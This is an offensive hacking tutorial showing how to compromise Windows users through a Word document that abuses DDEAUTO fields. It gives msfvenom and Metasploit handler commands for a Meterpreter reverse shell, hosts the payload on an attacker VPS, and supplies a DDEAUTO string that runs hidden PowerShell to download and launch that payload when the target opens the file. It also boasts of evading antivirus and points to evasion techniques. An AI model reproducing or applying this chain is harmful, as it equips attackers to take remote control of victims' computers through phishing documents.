Hacking peeps thanks to Microsoft, DDE style!


Welcome back to another hacking tutorial my Windows hackers! Today we will be exploiting….ERRRR “social engineering” the “bug”, according to Microsoft, in Office/Word 2016!

So let’s get started!

Windows provides several methods for transferring data between applications. One method is to use the Dynamic Data Exchange (DDE) protocol. The DDE protocol is a set of messages and guidelines. It sends messages between applications that share data and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available.

The first thing we will need is our trusty VPS of choice, this makes it so easy to setup btw.

This exploit will work when a computer is behind a router since the target will be launching the document for us, so no need to mess with firewalls and or possibly port forwarding for POC/exploit/bug.

Let’s install Ubuntu 16.04 1CPU and 1 GIG on a VPS, then we are going to install Apache2, and Msfconsole on it together

apt-get update
apt-get install apache2
apt install traceroute
apt-get install software-properties-common
sudo apt-add-repository ppa:brightbox/ruby-ng
sudo apt-get update
sudo apt-get install ruby2.4 ruby2.4-dev
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
bash msfinstall

In a basic rundown this exploit (bug) will run in Microsoft office word, then when executed by our target it will download our executable meterpreter shell from our Apache2 server, then run it, then we get a shell back, and the system is PWNED ;)

First, this we do is run msfconsole and add in the following command into Metasploit.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=VPSIPADDRESS LPORT=1337 -f exe > pwned.exe

We will then need to transfer the pwned.exe to our public visible HTML folder.
cp /root/pwned.exe /var/www/html

We will set the reverse shell to be ready to accept back in msfsoncosle

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST yourvpsip
set LPORT 1337( or whatever port you use)

Command tips:
sessions -l -----lists running sessions
sessions -i 1 ---interacts with session number

You can change the name from “pwned.exe” to whatever you’d like to be stealthier but then you have to edit the .doc file below to match it and the VPS IP address.

We will insert this command into our .doc file that we will be sending to the target. This command will hide the cmd when launched and downloading as well as hide the meterpreter pwned .exe file we created for our return shell. In this DDE syntax, pwned.exe will download to the same folder that contains our .doc file. This syntax is similar to the recent Hancitor malware going around right now.

Here (download link) you can download a sample file I have made for the POC if you'd like.

CTRL+F9 will be your shortcut to insert the commands into the dde brackets { }

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -W Hidden (New-ObjectSystem.Net.WebClient).DownloadFile('http://yourserverip/pwned.exe','\pwned.exe');Start-Process '\pwned.exe'

After the target opens the .doc file, you will get a meterpreter shell back. You will then have access to the system to do as you please ;)

This “bug, feature or exploit” has a low detection rating in antiviruses right now so is the perfect attack vector this year with all the WPA2 drama.

Below is some screenshots of the sample ERT POC .doc file that was uploaded to virustotal and only detected by 11 out of 60. Some of the bigger AV companies like Kaspersky,AVG,Avast,Malwarebyes are not detecting this DDE flaw at the moment. Probability because Microsoft says it’s a “feature” not a flaw (or something of that nature). In either case we can use this to our advantage if needed.

Note: If you get this working with DDE instead of DDEAUTO command the antivirus detection is around 1 or maybe 2 from what I’ve heard around twitter (Haven’t confirmed)

Note: These VPS IP's ^^^^ will be destoryed before you read this ;)

More possibly useful DDE formula's:

Added link: 11/1/17
OFFICE DDEAUTO Payload Generation script to automatically create a .vbs/.hta/.js payload for use inside a Microsoft Office document.

DDE antivirus detection bypass methods

More DDE Obfuscation and evasion techniques

Useful Links:

Happy attacking!